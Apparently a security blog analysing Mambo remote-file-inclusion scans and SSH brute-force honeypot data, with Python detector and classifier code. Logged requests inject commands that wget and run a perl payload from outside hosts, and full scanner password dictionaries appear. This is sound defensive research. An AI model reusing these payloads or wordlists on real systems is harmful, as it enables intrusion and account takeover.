High volume of web (Mambo) scans

Since Thursday night I’ve been seeing a high volume of scans
on different web servers, possibly for the following vulns:

http://secunia.com/advisories/14337/
http://www.osvdb.org/displayvuln.php?osvdb_id=10180

However, they say the problem is in function.php and I’m seeing them on index.php. Can anyone confirm that?
Some log samples below:

200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
58.26.138.159 - - [12/May/2006:16:03:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
200.80.39.39 - - [12/May/2006:16:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
217.160.131.47 - - [12/May/2006:16:29:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
58.26.138.159 - - [12/May/2006:16:36:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 167 "-" "Mozilla/5.0"

These are just a few from between 15:00 and 17:00 yesterday.
What is interesting is that they don’t do anything else: they
just try to execute it and leave (without searching for
other paths)… Btw, I’m seeing these alerts from
OSSEC.
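As an added example (not part of the original post, and not OSSEC code), here is a small Python detector that parses Apache combined-format log lines like the ones above, flags any request that tries to set mosConfig_absolute_path to a remote URL, and pulls out the include URL, the injected shell commands and the hosts the payload is fetched from. The sample entries embedded in it are constructed to mirror the ones quoted above, with the attacker hostnames replaced by .example names; the finding field names and the "404 means the target script is not even there" heuristic are this example's own.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample entries modelled on the access-log lines quoted in the post,
# one entry per line as in the real file; the attacker hosts are replaced by
# .example names. The second line is an ordinary Mambo page view for contrast.
SAMPLE_LOG = """\
200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dropsite.example/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://dropsite.example/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
192.0.2.10 - - [12/May/2006:15:30:00 -0300] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://other.example/tool.gif?&cmd=cd%20/tmp/;wget%20http://other.example/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The Mambo configuration variable the scans overwrite through register_globals.
# A value that begins with a URL scheme is a remote file inclusion attempt.
INCLUDE_PARAM = "mosConfig_absolute_path"
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://\S+', re.IGNORECASE)
WGET_RE = re.compile(r'\bwget\s+(\S+)')


def split_query(query):
    """Split a raw query string on '&' only and percent-decode both sides.

    Done by hand instead of urllib.parse.parse_qsl so that the ';' separators inside
    the injected shell command are never treated as parameter separators (older
    Python versions split on ';' by default) and so empty values like 'GLOBALS='
    survive.
    """
    params = []
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.append((unquote(name), unquote(value)))
    return params


def analyze_entry(entry):
    """Return a finding dict if the request is a remote-include attempt, else None."""
    parts = urlsplit(entry["url"])
    params = dict(split_query(parts.query))
    target = params.get(INCLUDE_PARAM, "")
    if not REMOTE_URL_RE.match(target):
        return None
    # The attacker ends the URL with '?' so whatever the vulnerable script appends
    # becomes a query string on their server instead of breaking the path.
    include_url = target.rstrip("?")
    raw_cmd = params.get("cmd", "").rstrip("?")
    commands = [c.strip() for c in raw_cmd.split(";") if c.strip()]
    drop_urls = []
    for command in commands:
        m = WGET_RE.search(command)
        if m:
            drop_urls.append(m.group(1))
    status = int(entry["status"])
    return {
        "ip": entry["ip"],
        "timestamp": entry["ts"],
        "path": parts.path,
        "include_url": include_url,
        "commands": commands,
        "drop_urls": drop_urls,
        "status": status,
        # _REQUEST[...] / GLOBALS in the query string: the register_globals trick
        # these scanners rely on to smuggle their own values into the script.
        "globals_override": any(k == "GLOBALS" or k.startswith("_REQUEST[") for k in params),
        # A 404 means the requested script does not exist here; anything else
        # (a 200 in particular) means a Mambo install answered and deserves a look.
        "needs_review": status != 404,
    }


def scan_log(text):
    """Parse every line of an access log and return the remote-include findings."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = analyze_entry(m.groupdict())
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = "REVIEW" if f["needs_review"] else "404"
        print(f"{f['timestamp']} {f['ip']} [{flag}] include={f['include_url']} drops={f['drop_urls']}")
```

Run it against a real access_log with `scan_log(open("/var/log/apache2/access_log").read())`; the drop URLs it collects are the hosts worth blocking at egress, since the payload only works if the web server can fetch from them.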

Interesting information about SSH scans

I spent last week doing some research on the recently very active SSH scans and sent out the following e-mail to the incidents mailing list. Just some clarification before the e-mail itself:

1- My modified version of SSHD is very simple and I won’t publish a diff. I basically just downloaded the latest version from openssh.org and added these two lines to auth-passwd.c (at line 80 of the file, just after the beginning of the auth_password function):

/* honeypot only: log every non-empty password attempt in clear text */
if (strlen(password) > 1)
        error("user: %s, pass: %s", authctxt->user, password);

2- Regarding the location of the scans, they look very
dispersed (my boxes are in the US). I got two from Brazil,
one from the UK, one from NL, one from Japan, two from
India (from the same ISP), two from the USA and one from
Canada…

I set up some honeypots and also made a few
modifications to the ssh daemon to print out the
passwords these scans were trying to use. I noticed a
reduction in the number of scans, but I still got a
few in the last few days.

Basically, I noticed two different scans.

** Scan 1 - Attempts many passwords against the root
account and a lot of attempts against common/default
accounts (with the password being the same as the
account name). What is interesting is that some of the
passwords for root don't look very simple and some
use keyboard combinations (probably common too).
Received scans of this type from 7 different IPs (same
passwords, users, etc).

** Scan 2 - Attempts a lot of strange passwords against
the root and admin accounts. Look below to see why I
think they are strange. Looks like the scanner is
broken :)
Received scans of this type from 3 different IPs.

*** User, password combinations:

** Scan 1 (user, password combinations):
user root, pass: 1qaz2wsx
user root, pass: 1q2w3e4r5t6y
user root, pass: 1qaz2wsx3edc4rfv
user root, pass: qazwsxedcrfv
user root, pass: webmaster
user root, pass: michael
user root, pass: work
user root, pass: maggie
user root, pass: print
user root, pass: 123456
user root, pass: root1234
user root, pass: 1qaz2wsx3edc
user root, pass: qazwsxedc
user root, pass: qazwsx
user root, pass: internet
user root, pass: mobile
user root, pass: windows
user root, pass: superman
user root, pass: 1q2w3e4r
user root, pass: network
user root, pass: system
user root, pass: administrator
user root, pass: 123qwe
user root, pass: manager
user root, pass: redhat
user root, pass: fedora
user root, pass: okmnji
user root, pass: qwerty
user root, pass: httpd
user root, pass: linux
user root, pass: coder
user root, pass: www
user root, pass: 123123
user root, pass: 1234567890

user james, pass: james
user cvs, pass: cvs
user tony, pass: tony
user bill, pass: bill
user print, pass: print
user maggie, pass: maggie
user info, pass: info
user http, pass: http
user ftp, pass: ftp
user dany, pass: dany
user suse, pass: suse
user oracle, pass: oracle
user tomcat, pass: tomcat
user backup, pass: backup
user id, pass: id
user sgi, pass: sgi
user postgres, pass: postgres
user flowers, pass: flowers
user internet, pass: internet
user linux, pass: linux
user nokia, pass: nokia
user bash, pass: bash
user mysql, pass: mysql
user webmaster, pass: webmaster

** Scan 2 (user, password combinations):
These passwords look very strange... Will anyone
ever use a password of root1234567890? :)

user root, pass: root12
user root, pass: root123
user root, pass: root1234
user root, pass: root12345
user root, pass: root123456
user root, pass: root1234567
user root, pass: root12345678
user root, pass: root123456789
user root, pass: root1234567890

user admin, pass: admin
user admin, pass: admin1
user admin, pass: admin12
user admin, pass: admin123
user admin, pass: admin1234
user admin, pass: admin12345
user admin, pass: admin123456
user admin, pass: admin1234567
user admin, pass: admin12345678
user admin, pass: admin123456789
user admin, pass: admin1234567890
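An added example, not part of the original e-mail and not OpenSSH code: a Python classifier for the user/password pairs the modified daemon logs. It parses syslog lines of the form the error() call above produces (the "sshd[pid]: error:" prefix is how OpenSSH's error() lines normally appear via syslog, but the exact prefix is assumed here) and sorts each password into the patterns described in the e-mail: password equal to the username, username followed by a run of 1234567890 (the scan-2 shape), pure digits, QWERTY keyboard walks such as 1qaz2wsx or okmnji, and everything else treated as a dictionary word. The keyboard adjacency model and the 70% threshold are this example's own choices, and the sample log lines are constructed.

```python
import re
from collections import Counter

# QWERTY layout used to spot "keyboard walk" passwords such as 1qaz2wsx or okmnji.
# Two keys count as adjacent when they are at most one row and one column apart
# (rough model of the real stagger, good enough for the passwords in the e-mail).
ROWS = ("1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm")
KEY_POS = {ch: (r, c) for r, row in enumerate(ROWS) for c, ch in enumerate(row)}
COUNTER = "1234567890"          # the digit run scan 2 appends to root/admin
WALK_THRESHOLD = 0.7            # assumed: share of adjacent key pairs to call it a walk
WALK_MIN_LEN = 6                # assumed: shorter strings are too easy to hit by accident

# Form of the lines the patched auth-passwd.c emits once syslog has wrapped them.
CRED_RE = re.compile(r"user: (?P<user>\S+), pass: (?P<password>.*)$")

# Constructed sample lines (not real honeypot output), mixing both scan types.
SAMPLE_SYSLOG = """\
May 12 03:14:07 honeypot sshd[4311]: error: user: root, pass: 1qaz2wsx
May 12 03:14:09 honeypot sshd[4311]: error: user: root, pass: redhat
May 12 03:14:11 honeypot sshd[4311]: error: user: root, pass: 123456
May 12 03:14:13 honeypot sshd[4311]: error: user: oracle, pass: oracle
May 12 03:14:15 honeypot sshd[4311]: error: user: tomcat, pass: tomcat
May 12 03:14:17 honeypot sshd[4311]: error: user: root, pass: okmnji
May 12 03:20:02 honeypot sshd[4390]: error: user: root, pass: root123456789
May 12 03:20:04 honeypot sshd[4390]: error: user: admin, pass: admin1234567890
"""


def _adjacent(a, b):
    pa, pb = KEY_POS.get(a), KEY_POS.get(b)
    if pa is None or pb is None:
        return False
    return abs(pa[0] - pb[0]) <= 1 and abs(pa[1] - pb[1]) <= 1


def keyboard_walk_score(password):
    """Fraction of consecutive character pairs that are neighbours on the keyboard."""
    pw = password.lower()
    if len(pw) < 2:
        return 0.0
    hits = sum(_adjacent(x, y) for x, y in zip(pw, pw[1:]))
    return hits / (len(pw) - 1)


def classify(user, password):
    """Label one attempt with the pattern it follows (most specific rule first)."""
    if password == user:
        return "same_as_user"
    suffix = password[len(user):]
    if password.startswith(user) and suffix and COUNTER.startswith(suffix):
        return "user_plus_counter"       # root12, root123, ... admin1234567890
    if password.isdigit():
        return "numeric"
    if len(password) >= WALK_MIN_LEN and keyboard_walk_score(password) >= WALK_THRESHOLD:
        return "keyboard_walk"
    return "word"


def parse_credential_line(line):
    """Return (user, password) from one patched-sshd log line, or None."""
    m = CRED_RE.search(line)
    return (m.group("user"), m.group("password")) if m else None


def summarize(log_text):
    """Count how many attempts fall into each password category."""
    counts = Counter()
    for line in log_text.splitlines():
        cred = parse_credential_line(line)
        if cred:
            counts[classify(*cred)] += 1
    return counts


if __name__ == "__main__":
    for category, n in sorted(summarize(SAMPLE_SYSLOG).items()):
        print(f"{category:18s} {n}")
```

A scan whose attempts are almost entirely user_plus_counter against root and admin is the "broken scanner" shape from scan 2; a mix of same_as_user, keyboard_walk and word attempts is the scan 1 dictionary. Feeding it the full honeypot log and grouping by the sshd pid in the prefix gives a per-connection profile.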